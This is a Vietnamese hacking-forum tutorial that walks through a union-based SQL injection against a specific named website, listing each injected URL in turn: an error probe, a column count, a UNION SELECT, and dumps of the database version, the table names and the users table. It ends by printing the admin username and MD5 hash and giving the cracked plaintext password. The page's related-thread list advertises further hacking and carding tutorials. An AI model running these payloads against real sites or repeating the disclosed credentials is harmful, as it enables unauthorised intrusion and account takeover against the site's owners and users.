[TUT] sqli thongbaomoithau.com

  • Thread starter Thread starter AdminAdmin is verified member.
  • Start date Start date
Admin

AdminAdmin is verified member.

Well-Known Member
Staff member
Administrator
Chào anh em BYG mình là Notes. Mấy bữa trước mình đã làm cái tut sql dạng thông thường và error base hôm nay mình làm thêm 1 cái tut nữa về html biến dạng :)
site lỗi :http://thongbaomoithau.com/
link lỗi :http://thongbaomoithau.com/thong-bao-moi-thau-15484'.html
bắt đầu nhé
Code: 
http://thongbaomoithau.com/thong-bao-moi-thau-15484'.html
--> lỗi
Code: 
http://thongbaomoithau.com/thong-bao-moi-thau-15484 order by 1-- -.html
--> bình thường
Code: 
http://thongbaomoithau.com/thong-bao-moi-thau-15484 order by 11-- -.html
--> lỗi
vậy chúng ta column lỗi cần tìm là 10 chúng ta bắt đầu union select nhé :)
Code: 
http://thongbaomoithau.com/thong-bao-moi-thau-15484 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -.html
không thấy hiện tượng hay lỗi của column nào thử thêm dâu '-' xem sao
Code: 
http://thongbaomoithau.com/thong-bao-moi-thau--15484 UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -.html
vẫn không thấy gì nhỉ :( nhưng nếu chú ý một tý thì các bạn sẽ thấy số 7 bị lỗi ngay chỗ title ak =)) vậy ta bắt đâu get được rồi
get version ,user ,database
Code: 
http://thongbaomoithau.com/thong-bao-moi-thau--15484 UNION SELECT 1,2,3,4,5,6,group_concat(version(),0x7c,user(),0x7c,database()),8,9,10-- -.html
5.5.23-log|moithau_admin@localhost|moithau_news
tiếp đến là get table_name
Code: 
http://thongbaomoithau.com/thong-bao-moi-thau--15484 UNION SELECT 1,2,3,4,5,6,group_concat(table_name),8,9,10 from information_schema.tables where table_schema=database()-- -.html
articles,articles_info,ban_group,ban_source,categories,categories_multi,comments,linhvuc,linhvuc_multi,mpi_kehoachdauthau,mpi_moisotuyen,mpi_thongbaomoithau,newsletter,nguon_nhandan,poll,poll_ip,poll_result,properties,rating,session,session_detail,styles,sub_categories,sub_linhvuc,time_limit,topmenu,users,visitors
get column
Code: 
http://thongbaomoithau.com/thong-bao-moi-thau--15484 UNION SELECT 1,2,3,4,5,6,group_concat(column_name),8,9,10 from information_schema.columns where table_schema=database() and table_name=0x7573657273-- -.html
get data
id,username,password,root,allowed
Code: 
http://thongbaomoithau.com/thong-bao-moi-thau--15484 UNION SELECT 1,2,3,4,5,6,group_concat(username,0x7c,password),8,9,10 from users-- -.html
admin|fe743d8d97aa7dfc6c93ccdc2e749513
và cuối cùng ta được admin|fe743d8d97aa7dfc6c93ccdc2e749513 khi md5 ra thì pas là 1234568
---> admin/1234568
end tut
TUT by Notes.
Click to expand...
Thanks nào............
 
You must log in or register to reply here.

Facebook Comments

Similar threads

KhangSkull
[TUT] Khai thác SQLi dạng .html
Replies
0
Views
6K
KhangSkull
KhangSkull
V
Share [Tut] Hack site lỗi SQLi với Havij + Up shell - Guan™
Replies
0
Views
3K
VnSlo
V
KhanhIT
TUT SQLi magic convert
Replies
0
Views
3K
KhanhIT
KhanhIT
Q
Cần mua tut reg domain bằng CCN
Replies
2
Views
2K
QuanCoder
Q
Admin
Share tut bắn reach ads Facebook mới nhất dùng thẻ cứng
Replies
2
Views
9K
huydainh
huydainh
Admin
Share tut ân hạn Facebook mới nhất 2020
Replies
2
Views
11K
vvnamtagame
vvnamtagame
Admin
Tut kháng Ad Breaks bị tắt kiếm tiền thành công
Replies
0
Views
2K
AdminAdmin is verified member.
Admin
Admin
Share một số tut chiến Facebook Ad Breaks theo kinh nghiệm
Replies
0
Views
2K
AdminAdmin is verified member.
Admin
S
[Tut]Basic Hacking - Hacking cơ bản
Replies
0
Views
4K
ShadoH
S
Smobi
Share [Tut] Làm một vật trở nên trong suốt bằng PTS
Replies
0
Views
2K
Smobi
Smobi
Back
Top